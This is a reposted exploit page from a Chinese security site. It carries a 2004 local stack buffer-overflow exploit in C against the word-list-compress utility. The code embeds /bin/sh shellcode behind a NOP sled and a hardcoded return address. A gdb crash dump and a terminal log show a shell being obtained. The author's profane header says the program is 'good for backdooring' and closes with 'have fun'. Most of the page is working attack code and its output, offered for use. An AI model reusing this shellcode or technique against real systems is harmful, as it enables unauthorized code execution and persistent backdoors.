首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
word-list-compress local exploit
来源:vfocus.net 作者:c0d3r 发布时间:2004-12-05  

word-list-compress local exploit

/*
Fuck private exploits .
Fuck iranian hacking (and security !!) teams who are just some fucking
kiddies.
Fuck all "Security money makers"

word-list-compress local exploit - SECU
Coded by : c0d3r / root . razavi1366[at]yahoo[dot]com
word-list-compress is not setuid . so good for backdooring .
gratz fly to : LorD - NT - sIiiS - vbehzadan - hyper sec members.
we are : LorD - c0d3r - NT; irc.persiairc.com 6667 #ihs
*/

#include<stdio.h>
#include<stdlib.h>
#define NOP 0x90
#define address 0xbffff2b8
#define size 350
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main()
{
char shellcode[] = /* 37 bytes shellcode written by myself */
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff"
"\xff/bin/sh";
char exploit[size];
char *ptr;
long *addr_ptr;
char test[300];
long addr;
int NL= 180;

int i;
int x=0;
ptr = exploit;
addr_ptr = (long *) ptr;

for(i=0;i < size;i+=4){
*(addr_ptr++) = address;
}
for(i=0; i < NL; i++ )
{
exploit[i] = NOP;
}
if(shellcode != NULL){
while(x != strlen(shellcode)){
exploit[NL] = shellcode[x];
NL+=1;x+=1;
}

}
exploit[size] = 0x00;

printf("word-list-compress local exploit by root / c0d3r\n");
printf("stack pointer: 0x%x\n", get_sp());
printf("using return address : 0x%x\n", address);
printf("using %d bytes shellcode\n", sizeof(shellcode));
setenv("exploit", exploit, 1);
putenv(exploit);
printf("exploit string loaded into the enviroment\n");
system("echo $exploit | word-list-compress c");
return 0;
}

/*

root@darkstar:/sploits# word-list-compress
Compresses or uncompresses sorted word lists.
For best result the locale should be set to C
before sorting by setting the environmental
variable LANG to "C" before sorting.
Copyright 2001 by Kevin Atkinson.
Usage: word-list-compress c[ompress]|d[ecompress]
root@darkstar:/sploits#

************************************************************

root@darkstar:/sploits# echo `perl -e 'print "A"x300'` |
word-list-compress c
Segmentation fault (core dumped)
root@darkstar:/sploits# gdb -c core
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux".
Core was generated by `word-list-compress c'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40154c20 1075137568
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xbffff560 0xbffff560
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x210246 2163270
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
---Type <return> to continue, or q <return> to quit---

**********************************************************

root@darkstar:/sploits# gcc word-list-compress.c -o word-list-compress
word-list-compress.c:65:2: warning: no newline at end of file
root@darkstar:/sploits# ./word-list-compress
word-list-compress local exploit by root / c0d3r
stack pointer: 0xbffff268
using return address : 0xbffff2b8
using 37 bytes shellcode
exploit string loaded into the enviroment
[1 C[C KS /bin/sh sh-2.05b# echo IHS
IHS
sh-2.05b#

************************************************************

thats all . have fun !
*/



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Orbz Buffer Overflow Exploit
·Mercury Mail 4.01 (Pegasus) IM
·Mercury Mail 4.01 IMAP Buffer
·Remote Mercury32 Imap exploit
·Serious engine Fake Players Do
·Mozilla Products Remote Crash
·WS_FTP Server MKD Buffer Overf
·phpBB <= 2.0.10 remote comm
·Star Wars Battlefront Fake Pla
·Battlefield 1942 and Vietnam b
·phpBB admin_cash.php File Incl
·Mac OS X / Adobe Version Cue l
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved